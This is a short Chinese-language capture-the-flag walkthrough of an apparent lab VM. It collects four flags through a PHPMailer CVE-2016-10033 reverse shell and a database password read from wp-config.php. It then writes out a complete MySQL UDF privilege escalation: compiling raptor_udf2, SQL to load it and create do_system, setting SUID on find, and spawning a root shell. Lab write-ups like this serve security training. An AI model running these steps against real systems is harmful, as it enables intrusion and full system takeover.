扫描目录发现/vendor/PATH，得到flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}，网站使用PHPMailer 5.2.16，存在CVE 2016-10033远程代码执行漏洞
https://www.exploit-db.com/exploits/40974，加上# -*- coding: utf-8 -*-，利用点是contact.php，改相关IP，运行exp后访问contact.php可以生成反弹shell
find / -name "*flag*" -print 2>/dev/null
cat /var/www/flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}
还访问http://192.168.56.101/wordpress/wp-content/uploads/2018/11/flag3.png，得到flag3{a0f568aa9de277887f37730d71520d9b}
上传内核漏洞扫描脚本，mysql以root权限运行，可以利用mysql udf提权漏洞，https://www.exploit-db.com/exploits/1518
查看wp-config.php发现数据库口令R@v3nSecurity，于是
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
生成so文件后上传靶机/tmp下，赋予777权限
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');
exit
这时就能用find的suid提权，find / -exec "/bin/sh" \;
在/root目录下得到flag4{df2bc5e951d91581467bb9a2a8ff4425}
至此，4个flag全部完成
